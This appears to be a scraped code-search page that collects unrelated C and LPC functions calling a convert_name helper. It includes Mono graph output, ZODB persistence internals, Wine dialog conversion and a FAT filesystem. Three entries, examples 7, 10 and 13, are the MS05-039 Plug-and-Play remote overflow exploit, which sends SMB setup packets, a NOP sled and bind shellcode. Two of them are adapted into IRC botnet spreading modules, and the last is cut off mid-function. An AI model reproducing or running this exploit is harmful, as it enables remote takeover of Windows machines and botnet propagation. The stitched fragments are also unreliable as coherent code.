Exemplo n.º 1
0
static void
mono_draw_cfg (MonoCompile *cfg, FILE *fp)
{
	fprintf (fp, "digraph %s {\n", convert_name (cfg->method->name));
	fprintf (fp, "node [fontsize=12.0]\nedge [len=1,color=red]\n");
	fprintf (fp, "label=\"CFG for %s\";\n", mono_method_full_name (cfg->method, TRUE));

	fprintf (fp, "BB0 [shape=doublecircle];\n");
	fprintf (fp, "BB1 [color=red];\n");

	cfg_emit_one_loop_level (cfg, fp, NULL);

	fprintf (fp, "}\n");
}
Exemplo n.º 2
0
    void	        *open(const char *filename)
    {
        std::string dllName(filename);

# if defined(__GNUG__)
        return dlopen(filename, RTLD_LAZY);
# elif defined(_MSC_VER)
        convert_name(dllName);
        std::cout << dllName << std::endl;
        return LoadLibrary(CStringW(dllName.c_str()));
# else
#		error G++ or MS compiler required
# endif
    }
Exemplo n.º 3
0
static void
mono_draw_dtree (MonoCompile *cfg, FILE *fp)
{
	g_assert ((cfg->comp_done & MONO_COMP_IDOM));

	fprintf (fp, "digraph %s {\n", convert_name (cfg->method->name));
	fprintf (fp, "node [fontsize=12.0]\nedge [len=1,color=red]\n");
	fprintf (fp, "label=\"Dominator tree for %s\";\n", mono_method_full_name (cfg->method, TRUE));

	fprintf (fp, "BB0 [shape=doublecircle];\n");
	fprintf (fp, "BB1 [color=red];\n");

	dtree_emit_one_loop_level (cfg, fp, NULL);

	fprintf (fp, "}\n");
}
Exemplo n.º 4
0
Arquivo: trans.c Projeto: Elohim/FGmud
mixed cmd(string args) {
    object ob;

    if( !args || args == "" ) return "Trans whom?";
    if( !(ob = find_player(convert_name(args))) && !(ob = find_living(args)) )
        return "No such being exists anywhere presently.";
    if( environment(ob) == environment(this_player()) ) 
        return ob->GetCapName() + " is right here.";
    if(archp(ob) && !archp(this_player())){
        write("You can't trans an admin.");
        tell_player(ob, this_player()->GetName()+" just tried to trans you.");
        return 1;
    }
    ob->SetProperty("ReturnSite",base_name(environment(ob)));
    message("system", "You have been summoned by " + 
            this_player()->GetName() + ".", ob);
    if( !(ob->eventMoveLiving(environment(this_player()))) )
        return "Failed to move " + ob->GetCapName() + ".";
    else message("system", "You trans " + ob->GetCapName() + 
            " to you.", this_player());
    return 1;
}
Exemplo n.º 5
0
static PyObject*
Per_getattro(cPersistentObject *self, PyObject *name)
{
    PyObject *result = NULL;    /* guilty until proved innocent */
    PyObject *converted;
    char *s;

    converted = convert_name(name);
    if (!converted)
        goto Done;
    s = PyBytes_AS_STRING(converted);

    if (unghost_getattr(s))
    {
        if (unghostify(self) < 0)
            goto Done;
        accessed(self);
    }
    result = PyObject_GenericGetAttr((PyObject *)self, name);

Done:
    Py_XDECREF(converted);
    return result;
}
Exemplo n.º 6
0
static PyObject *
pickle_copy_dict(PyObject *state)
{
    PyObject *copy, *key, *value;
    char *ckey;
    Py_ssize_t pos = 0;

    copy = PyDict_New();
    if (!copy)
        return NULL;

    if (!state)
        return copy;

    while (PyDict_Next(state, &pos, &key, &value))
    {
        int is_special;
#ifdef PY3K
        if (key && PyUnicode_Check(key))
        {
            PyObject *converted = convert_name(key);
            ckey = PyBytes_AS_STRING(converted);
#else
        if (key && PyBytes_Check(key))
        {
            ckey = PyBytes_AS_STRING(key);
#endif
            is_special = (*ckey == '_' &&
                          (ckey[1] == 'v' || ckey[1] == 'p') &&
                           ckey[2] == '_');
#ifdef PY3K
            Py_DECREF(converted);
#endif
            if (is_special) /* skip volatile and persistent */
                continue;
        }

        if (PyObject_SetItem(copy, key, value) < 0)
            goto err;
    }

    return copy;
err:
    Py_DECREF(copy);
    return NULL;
}


static char pickle___getstate__doc[] =
  "Get the object serialization state\n"
  "\n"
  "If the object has no assigned slots and has no instance dictionary, then \n"
  "None is returned.\n"
  "\n"
  "If the object has no assigned slots and has an instance dictionary, then \n"
  "the a copy of the instance dictionary is returned. The copy has any items \n"
  "with names starting with '_v_' or '_p_' ommitted.\n"
  "\n"
  "If the object has assigned slots, then a two-element tuple is returned.  \n"
  "The first element is either None or a copy of the instance dictionary, \n"
  "as described above. The second element is a dictionary with items \n"
  "for each of the assigned slots.\n"
  ;

static PyObject *
pickle___getstate__(PyObject *self)
{
    PyObject *slotnames=NULL, *slots=NULL, *state=NULL;
    PyObject **dictp;
    int n=0;

    slotnames = pickle_slotnames(Py_TYPE(self));
    if (!slotnames)
        return NULL;

    dictp = _PyObject_GetDictPtr(self);
    if (dictp)
        state = pickle_copy_dict(*dictp);
    else
    {
        state = Py_None;
        Py_INCREF(state);
    }

    if (slotnames != Py_None)
    {
        int i;

        slots = PyDict_New();
        if (!slots)
            goto end;

        for (i = 0; i < PyList_GET_SIZE(slotnames); i++)
        {
            PyObject *name, *value;
            char *cname;
            int is_special;

            name = PyList_GET_ITEM(slotnames, i);
#ifdef PY3K
            if (PyUnicode_Check(name))
            {
                PyObject *converted = convert_name(name);
                cname = PyBytes_AS_STRING(converted);
#else
            if (PyBytes_Check(name))
            {
                cname = PyBytes_AS_STRING(name);
#endif
                is_special = (*cname == '_' &&
                              (cname[1] == 'v' || cname[1] == 'p') &&
                               cname[2] == '_');
#ifdef PY3K
                Py_DECREF(converted);
#endif
                if (is_special) /* skip volatile and persistent */
                {
                    continue;
                }
            }

            /* Unclear:  Will this go through our getattr hook? */
            value = PyObject_GetAttr(self, name);
            if (value == NULL)
                PyErr_Clear();
            else
            {
                int err = PyDict_SetItem(slots, name, value);
                Py_DECREF(value);
                if (err < 0)
                    goto end;
                n++;
            }
        }
    }

    if (n)
        state = Py_BuildValue("(NO)", state, slots);

end:
    Py_XDECREF(slotnames);
    Py_XDECREF(slots);

    return state;
}

static int
pickle_setattrs_from_dict(PyObject *self, PyObject *dict)
{
    PyObject *key, *value;
    Py_ssize_t pos = 0;

    if (!PyDict_Check(dict))
    {
        PyErr_SetString(PyExc_TypeError, "Expected dictionary");
        return -1;
    }

    while (PyDict_Next(dict, &pos, &key, &value))
    {
        if (PyObject_SetAttr(self, key, value) < 0)
            return -1;
    }
    return 0;
}
Exemplo n.º 7
0
int
main (int argc, char **argv)
{
	struct sockaddr_in addr;
	struct hostent *he;
	int len;
	int sockfd;
	unsigned short smblen;
	unsigned short bindport;
	unsigned char tmp[1024];
	unsigned char packet[4096];
	unsigned char *ptr;
	char recvbuf[4096];

#ifdef _WIN32
	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0), &wsa);
#endif

	printf("\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
	printf("\t         Universal Exploit + no crash shellcode\n\n");
	printf("\t         [Spanish hack by RoMaNSoFt :-)]\n\n\n");
	printf("\t            Copyright (c) 2005 .: houseofdabus :.\n\n\n");


	if (argc < 3) {
		printf("%s <host> <bind port>\n", argv[0]);
		exit(0);
	}

	if ((he = gethostbyname(argv[1])) == NULL) {
		printf("[-] Unable to resolve %s\n", argv[1]);
		exit(0);
	}

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		printf("[-] socket failed\n");
		exit(0);
	}

	addr.sin_family = AF_INET;
	addr.sin_port = htons(445);
	addr.sin_addr = *((struct in_addr *)he->h_addr);
	memset(&(addr.sin_zero), '\0', 8);



	printf("\n[*] connecting to %s:445...", argv[1]);
	if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
		printf("\n[-] connect failed\n");
		exit(0);
	}
	printf("ok\n");

	printf("[*] null session...");
	if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if (len <= 10) {
		printf("\n[-] failed\n");
		exit(0);
	}

	if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	ptr = packet;
	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
	ptr += sizeof(SMB_TreeConnectAndX)-1;

	sprintf(tmp, "\\\\%s\\IPC$", argv[1]);
	convert_name(ptr, tmp);
	smblen = strlen(tmp)*2;
	ptr += smblen;
	smblen += 9;
	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
	ptr += sizeof(SMB_TreeConnectAndX_)-1;

	smblen = ptr-packet;
	smblen -= 4;
	memcpy(packet+3, &smblen, 1);

	if (send(sockfd, packet, ptr-packet, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	printf("ok\n");
	printf("[*] bind pipe...");

	if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		printf("\n[-] failed\n");
		exit(0);
	}

	printf("ok\n");
	printf("[*] sending crafted packet...");

	// nop
	ptr = packet;
	memset(packet, '\x90', sizeof(packet));

	// header & offsets
	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
	ptr += sizeof(RPC_call)-1;

	// shellcode
	bindport = (unsigned short)atoi(argv[2]);
	bindport ^= 0x0437;
	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

	// end of packet
	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
		RPC_call_end,
		sizeof(RPC_call_end)-1);

	// sending...
	if (send(sockfd, packet, 2196, 0) < 0) {
		printf("\n[-] send failed\n");
		exit(0);
	}
	printf("ok\n");
	printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));

	recv(sockfd, recvbuf, 4096, 0);

return 0;
}
Exemplo n.º 8
0
int open_path(int drive, const char *path) // Opening the directory(s)...
{
	int i, j, curdir_handle, new_handle;
	char name_comp[13], conv_name[11];

	// Open the directory component
	i =0;
	if (path[0] == '/' || path[0] == '\\')	// Absolute path
	{
		curdir_handle = root_handle(drive);
		i = 1;
	}
	else curdir_handle = get_curdir_handle(drive);

	// Increment the reference count
	increment_ref_count(curdir_handle);

	while (path[i] != 0)
	{
		j = 0;
		
		while (j < 12 && path[i] != 0 && path[i] != '/' && path[i] != '\\')
		{
			name_comp[j] = path[i];
			j++; i++;
		}

		if (path[i] != 0) i++; 

		name_comp[j] = 0;

		if (strcmp(name_comp,".") == 0) continue;
		else if (strcmp(name_comp,"..") == 0)
		{
			new_handle = get_parent_handle(curdir_handle);
			if (new_handle >= 0)
				increment_ref_count(new_handle);
		}
		else
		{
			// Open that directory component
			if (convert_name(name_comp, conv_name) < 0)
			{
				close_dir(curdir_handle);
					return EINVALIDNAME; // Error
			}

			new_handle = open_dir(curdir_handle, conv_name);
		}

		if (new_handle < 0)
		{
			close_dir(curdir_handle);
			return new_handle; // Error
		}

		close_dir(curdir_handle); // Effectively decrease the
					  // reference count to 1 less.
		curdir_handle = new_handle;
	}

	// Successfully opened the path
	return curdir_handle;
}
Exemplo n.º 9
0
static void
ghostify(cPersistentObject *self)
{
    PyObject **dictptr, *slotnames;

    /* are we already a ghost? */
    if (self->state == cPersistent_GHOST_STATE)
        return;

    /* Is it ever possible to not have a cache? */
    if (self->cache == NULL) 
    {
        self->state = cPersistent_GHOST_STATE;
        return;
    }

    if (self->ring.r_next == NULL)
    {
        /* There's no way to raise an error in this routine. */
#ifdef Py_DEBUG
        fatal_1350(self, "ghostify", "claims to be in a cache but isn't");
#else
        return;
#endif
    }

    /* If we're ghostifying an object, we better have some non-ghosts. */
    assert(self->cache->non_ghost_count > 0);
    self->cache->non_ghost_count--;
    self->cache->total_estimated_size -= 
        _estimated_size_in_bytes(self->estimated_size);
    ring_del(&self->ring);
    self->state = cPersistent_GHOST_STATE;

    /* clear __dict__ */
    dictptr = _PyObject_GetDictPtr((PyObject *)self);
    if (dictptr && *dictptr)
    {
        Py_DECREF(*dictptr);
        *dictptr = NULL;
    }

    /* clear all slots besides _p_*
     * ( for backward-compatibility reason we do this only if class does not
     *   override __new__ ) */
    if (Py_TYPE(self)->tp_new == Pertype.tp_new)
    {
        slotnames = pickle_slotnames(Py_TYPE(self));
        if (slotnames && slotnames != Py_None)
        {
            int i;

            for (i = 0; i < PyList_GET_SIZE(slotnames); i++)
            {
                PyObject *name;
                char *cname;
                int is_special;

                name = PyList_GET_ITEM(slotnames, i);
#ifdef PY3K
                if (PyUnicode_Check(name))
                {
                    PyObject *converted = convert_name(name);
                    cname = PyBytes_AS_STRING(converted);
#else
                if (PyBytes_Check(name))
                {
                    cname = PyBytes_AS_STRING(name);
#endif
                    is_special = !strncmp(cname, "_p_", 3);
#ifdef PY3K
                    Py_DECREF(converted);
#endif
                    if (is_special) /* skip persistent */
                    {
                        continue;
                    }
                }

                /* NOTE: this skips our delattr hook */
                if (PyObject_GenericSetAttr((PyObject *)self, name, NULL) < 0)
                    /* delattr of non-set slot will raise AttributeError - we
                     * simply ignore. */
                    PyErr_Clear();
            }
        }
        Py_XDECREF(slotnames);
    }

    /* We remove the reference to the just ghosted object that the ring
    * holds.  Note that the dictionary of oids->objects has an uncounted
    * reference, so if the ring's reference was the only one, this frees
    * the ghost object.  Note further that the object's dealloc knows to
    * inform the dictionary that it is going away.
    */
    Py_DECREF(self);
}

static int
changed(cPersistentObject *self)
{
    if ((self->state == cPersistent_UPTODATE_STATE ||
        self->state == cPersistent_STICKY_STATE)
        && self->jar)
    {
        PyObject *meth, *arg, *result;
        static PyObject *s_register;

        if (s_register == NULL)
            s_register = INTERN("register");
        meth = PyObject_GetAttr((PyObject *)self->jar, s_register);
        if (meth == NULL)
            return -1;
        arg = PyTuple_New(1);
        if (arg == NULL) 
        {
            Py_DECREF(meth);
            return -1;
        }
        Py_INCREF(self);
        PyTuple_SET_ITEM(arg, 0, (PyObject *)self);
        result = PyEval_CallObject(meth, arg);
        Py_DECREF(arg);
        Py_DECREF(meth);
        if (result == NULL)
            return -1;
        Py_DECREF(result);

        self->state = cPersistent_CHANGED_STATE;
    }

    return 0;
}

static int
readCurrent(cPersistentObject *self)
{
    if ((self->state == cPersistent_UPTODATE_STATE ||
        self->state == cPersistent_STICKY_STATE)
        && self->jar && self->oid)
    {
        static PyObject *s_readCurrent=NULL;
        PyObject *r;

        if (s_readCurrent == NULL)
            s_readCurrent = INTERN("readCurrent");

        r = PyObject_CallMethodObjArgs(self->jar, s_readCurrent, self, NULL);
        if (r == NULL)
            return -1;

        Py_DECREF(r);
    }

    return 0;
}

static PyObject *
Per__p_deactivate(cPersistentObject *self)
{
    if (self->state == cPersistent_UPTODATE_STATE && self->jar)
    {
        PyObject **dictptr = _PyObject_GetDictPtr((PyObject *)self);
        if (dictptr && *dictptr)
        {
            Py_DECREF(*dictptr);
            *dictptr = NULL;
        }
        /* Note that we need to set to ghost state unless we are
            called directly. Methods that override this need to
            do the same! */
        ghostify(self);
        if (PyErr_Occurred())
            return NULL;
    }

    Py_INCREF(Py_None);
    return Py_None;
}

static PyObject *
Per__p_activate(cPersistentObject *self)
{
    if (unghostify(self) < 0)
        return NULL;

    Py_INCREF(Py_None);
    return Py_None;
}

static int Per_set_changed(cPersistentObject *self, PyObject *v);

static PyObject *
Per__p_invalidate(cPersistentObject *self)
{
    signed char old_state = self->state;

    if (old_state != cPersistent_GHOST_STATE)
    {
        if (Per_set_changed(self, NULL) < 0)
            return NULL;
        ghostify(self);
        if (PyErr_Occurred())
            return NULL;
    }
    Py_INCREF(Py_None);
    return Py_None;
}
Exemplo n.º 10
0
BOOL
ppexploit (EXINFO exinfo)
//main (int argc, char **argv)
{
	int len;
	char buffer[IRCLINE];
	SOCKET sockfd;
	int pport = 7777;
	BOOL success = FALSE;
	SOCKADDR_IN their_addr;
	memset(&their_addr, 0, sizeof(their_addr));
	//struct sockaddr_in addr;
	char recvbuf[4096];
//	struct hostent *he;
	unsigned short smblen;
	unsigned short bindport;
	char tmp[1024];
	char packet[4096];
	char *ptr;


/*	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0), &wsa);*/


	//printf("\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
	//printf("\t         Universal Exploit + no crash shellcode\n\n\n");
	//printf("\t            Copyright (c) 2005 .: houseofdabus :.\n\n\n");


/*	if (argc < 3) {
		printf("%s <host> <bind port>\n", argv[0]);
		exit(0);
	}
*/
/*	if ((he = gethostbyname(argv[1])) == NULL) {
		printf("[-] Unable to resolve %s\n", argv[1]);
		exit(0);
	}
*/
	if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) {
		return FALSE;
	}
	their_addr.sin_family = AF_INET;
	their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); 
	their_addr.sin_port = fhtons((unsigned short)exinfo.port);
	
	/*addr.sin_family = AF_INET;
	addr.sin_port = fhtons((unsigned short)exinfo.port);
	addr.sin_addr.s_addr = finet_addr(exinfo.ip);*/
	memset(&(their_addr.sin_zero), '\0', 8);



	//printf("\n[*] connecting to %s:445...", argv[1]);
	if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(struct sockaddr)) < 0) {
		return FALSE;
	}
	//printf("ok\n");

	//printf("[*] null session...");
	if (fsend(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
		return FALSE;
	}

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		return FALSE;
	}

	if (fsend(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
		return FALSE;
	}

	len = frecv(sockfd, recvbuf, 4096, 0);
	if (len <= 10) {
		return FALSE;
	}

	if (fsend(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
		return FALSE;
	}

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		return FALSE;
	}

	ptr = packet;
	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
	ptr += sizeof(SMB_TreeConnectAndX)-1;

	sprintf(tmp, "\\\\%s\\IPC$", exinfo.ip);
	convert_name(ptr, tmp);
	smblen = strlen(tmp)*2;
	ptr += smblen;
	smblen += 9;
	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
	ptr += sizeof(SMB_TreeConnectAndX_)-1;

	smblen = ptr-packet;
	smblen -= 4;
	memcpy(packet+3, &smblen, 1);

	if (fsend(sockfd, packet, ptr-packet, 0) < 0) {
		return FALSE;
	}

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		return FALSE;
	}

	//printf("ok\n");
	//printf("[*] bind pipe...");

	if (fsend(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
		return FALSE;
	}

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		return FALSE;
	}

	if (fsend(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
		return FALSE;
	}

	len = frecv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		return FALSE;
	}

	//printf("ok\n");
	//printf("[*] sending crafted packet...");

	// nop
	ptr = packet;
	memset(packet, '\x90', sizeof(packet));

	// header & offsets
	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
	ptr += sizeof(RPC_call)-1;

	// shellcode
	bindport = (unsigned short)atoi((const char *)pport);
	bindport ^= 0x0437;
	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

	// end of packet
	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
		RPC_call_end,
		sizeof(RPC_call_end)-1);

	// sending...
	if (fsend(sockfd, packet, 2196, 0) < 0) {
		return FALSE;
	}
//	printf("ok\n");
//	printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));
	frecv(sockfd, recvbuf, 4096, 0);
	Sleep(300);
	fclosesocket(sockfd);
	if (ConnectShell2(exinfo)) {
		if(!exinfo.silent)
		{
			_snprintf(buffer, sizeof(buffer), "[FTP]: Transfer info sent to IP: %s.", exinfo.ip);
			irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
			addlog(buffer);
		}
		exploit[exinfo.exploit].stats++;
		return TRUE;
	}
return FALSE;
}
Exemplo n.º 11
0
/**********************************************************************
 *	    ConvertDialog32To16   (KERNEL.615)
 */
VOID WINAPI ConvertDialog32To16( LPVOID dialog32, DWORD size, LPVOID dialog16 )
{
    WORD nbItems, data, dialogEx;
    DWORD style;

    style = get_dword( &dialog32 );
    put_dword( &dialog16, style );
    dialogEx = (style == 0xffff0001);  /* DIALOGEX resource */
    if (dialogEx)
    {
        put_dword( &dialog16, get_dword( &dialog32 ) );  /* helpID */
        put_dword( &dialog16, get_dword( &dialog32 ) );  /* exStyle */
        style = get_dword( &dialog32 );
        put_dword( &dialog16, style );                   /* style */
    }
    else
        dialog32 = (DWORD *)dialog32 + 1; /* exStyle ignored in 16-bit standard dialog */

    nbItems = get_word( &dialog32 );
    put_byte( &dialog16, nbItems );
    put_word( &dialog16, get_word( &dialog32 ) ); /* x */
    put_word( &dialog16, get_word( &dialog32 ) ); /* y */
    put_word( &dialog16, get_word( &dialog32 ) ); /* cx */
    put_word( &dialog16, get_word( &dialog32 ) ); /* cy */

    /* Transfer menu name */
    convert_name( &dialog16, &dialog32 );

    /* Transfer class name */
    convert_name( &dialog16, &dialog32 );

    /* Transfer window caption */
    WideCharToMultiByte( CP_ACP, 0, dialog32, -1, dialog16, 0x7fffffff, NULL, NULL );
    dialog16 = (LPSTR)dialog16 + strlen( (LPSTR)dialog16 ) + 1;
    dialog32 = (LPWSTR)dialog32 + strlenW( (LPWSTR)dialog32 ) + 1;

    /* Transfer font info */
    if (style & DS_SETFONT)
    {
        put_word( &dialog16, get_word( &dialog32 ) );  /* pointSize */
        if (dialogEx)
        {
            put_word( &dialog16, get_word( &dialog32 ) ); /* weight */
            put_word( &dialog16, get_word( &dialog32 ) ); /* italic */
        }
        WideCharToMultiByte( CP_ACP, 0, (LPWSTR)dialog32, -1, (LPSTR)dialog16, 0x7fffffff, NULL, NULL );  /* faceName */
        dialog16 = (LPSTR)dialog16 + strlen( (LPSTR)dialog16 ) + 1;
        dialog32 = (LPWSTR)dialog32 + strlenW( (LPWSTR)dialog32 ) + 1;
    }

    /* Transfer dialog items */
    while (nbItems)
    {
        /* align on DWORD boundary (32-bit only) */
        dialog32 = (LPVOID)(((UINT_PTR)dialog32 + 3) & ~3);

        if (dialogEx)
        {
            put_dword( &dialog16, get_dword( &dialog32 ) ); /* helpID */
            put_dword( &dialog16, get_dword( &dialog32 ) ); /* exStyle */
            put_dword( &dialog16, get_dword( &dialog32 ) ); /* style */
        }
        else
        {
            style = get_dword( &dialog32 );    /* save style */
            dialog32 = (DWORD *)dialog32 + 1;  /* ignore exStyle */
        }

        put_word( &dialog16, get_word( &dialog32 ) ); /* x */
        put_word( &dialog16, get_word( &dialog32 ) ); /* y */
        put_word( &dialog16, get_word( &dialog32 ) ); /* cx */
        put_word( &dialog16, get_word( &dialog32 ) ); /* cy */

        if (dialogEx)
            put_dword( &dialog16, get_dword( &dialog32 ) ); /* ID */
        else
        {
            put_word( &dialog16, get_word( &dialog32 ) ); /* ID */
            put_dword( &dialog16, style );  /* style from above */
        }

        /* Transfer class name */
        switch (*(WORD *)dialog32)
        {
        case 0x0000:
            get_word( &dialog32 );
            put_byte( &dialog16, 0 );
            break;
        case 0xffff:
            get_word( &dialog32 );
            put_byte( &dialog16, get_word( &dialog32 ) );
            break;
        default:
            WideCharToMultiByte( CP_ACP, 0, (LPWSTR)dialog32, -1, (LPSTR)dialog16, 0x7fffffff, NULL, NULL );
            dialog16 = (LPSTR)dialog16 + strlen( (LPSTR)dialog16 ) + 1;
            dialog32 = (LPWSTR)dialog32 + strlenW( (LPWSTR)dialog32 ) + 1;
            break;
        }

        /* Transfer window name */
        convert_name( &dialog16, &dialog32 );

        /* Transfer data */
        data = get_word( &dialog32 );
        if (dialogEx)
            put_word(&dialog16, data);
        else
            put_byte(&dialog16,(BYTE)data);

        if (data)
        {
            memcpy( dialog16, dialog32, data );
            dialog16 = (BYTE *)dialog16 + data;
            dialog32 = (BYTE *)dialog32 + data;
        }

        /* Next item */
        nbItems--;
    }
}
Exemplo n.º 12
0
int syscall_stat(const char *file_name, struct stat *buf)
{
	int drive;
	int curdir_handle;
	char name_comp[13], conv_name[11], dir_path[501];
	struct dir_entry dent;
	int err, count;
	struct date_time dt;
	int clno;

	if (strlen(file_name) > 500) return ELONGPATH;

	parse_path(file_name, &drive, dir_path, name_comp);

	if (dir_path[0] != 0)
	{
		curdir_handle = open_path(drive, dir_path);

		if (curdir_handle < 0)
		{
			return curdir_handle;	// Error
		}
	}
	else
	{
		curdir_handle = get_curdir_handle(drive);
		increment_ref_count(curdir_handle);
	}

	// Last file name component.
	if (convert_name(name_comp, conv_name) < 0)
	{
		err =  EINVALIDNAME; // Error
	}
	else if (find_entry(curdir_handle, conv_name, &dent) == 1)
	{
		// Fill up the stat buf
		buf->st_dev = drive;
		buf->st_ino = 0;
		buf->st_mode = dent.attrib;
		buf->st_nlink = 1;
		buf->st_uid = buf->st_gid = 0;
		buf->st_rdev = 0;
		buf->st_size = dent.fsize;
		buf->st_blksize = 512;
		// Find time in seconds
		dt.seconds = (dent.time & 0x1f) * 2;
		dt.minutes = ((dent.time & 0x7e0) >> 5);
		dt.hours = (((unsigned short int)(dent.time & 0xf800)) >> 11);
		dt.date = dent.date & 0x1f;
		dt.month = ((dent.date & 0x1e0) >> 5);
		dt.year = (((unsigned short int)(dent.date & 0xfe00)) >> 9);

		buf->st_atime = buf->st_mtime = buf->st_ctime = date_to_secs(dt);

		// Find number of blocks
		count = 0;
		clno = dent.start_cluster;
		while (clno < 0xff8)
		{
			count++;
			clno = next_cluster_12(clno);
		}
		buf->st_blocks = count;
		err = 0;
	}
Exemplo n.º 13
0
BOOL pnp(EXINFO exinfo)
{
	struct sockaddr_in addr;
	struct hostent *he;
	int len;
	int sockfd;
	unsigned short smblen;
	unsigned short bindport;
	unsigned char tmp[1024];
	unsigned char packet[4096];
	unsigned char *ptr;
	char recvbuf[4096];
    char buffer[IRCLINE];

#ifdef _WIN32
	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0), &wsa);
#endif

//	printf("\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
//	printf("\t         Universal Exploit + no crash shellcode\n\n\n");
//	printf("\t            Copyright (c) 2005 .: houseofdabus :.\n\n\n");


//	if (exinfo.ip < 3) {
	//	printf("%s <host> <bind port>\n", argv[0]);
	//	exit(0);
// return false;
//	}

	if ((he = gethostbyname(exinfo.ip)) == NULL) {
	//	printf("[-] Unable to resolve %s\n", argv[1]);
	//	exit(0);
      return false;
	}

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
	//	printf("[-] socket failed\n");
	//	exit(0);

	}

	addr.sin_family = AF_INET;
	addr.sin_port = htons(445);
	addr.sin_addr = *((struct in_addr *)he->h_addr);
	memset(&(addr.sin_zero), '\0', 8);



	//printf("\n[*] connecting to %s:445...", argv[1]);
	if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
		//printf("\n[-] connect failed\n");
		//exit(0);
      return false;
	}
//	printf("ok\n");

//	printf("[*] null session...");
	if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
	//	printf("\n[-] send failed\n");
	//	exit(0);
 return false;
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
	//	printf("\n[-] failed\n");
	//	exit(0);
   return false;
	}

	if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
	//	printf("\n[-] send failed\n");
	//	exit(0);
    return false;
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if (len <= 10) {
	//	printf("\n[-] failed\n");
	//	exit(0);
    return false;
	}

	if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
	//	printf("\n[-] send failed\n");
	//	exit(0);
    return false;
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		//printf("\n[-] failed\n");
	//	exit(0);
    return false;
	}

	ptr = packet;
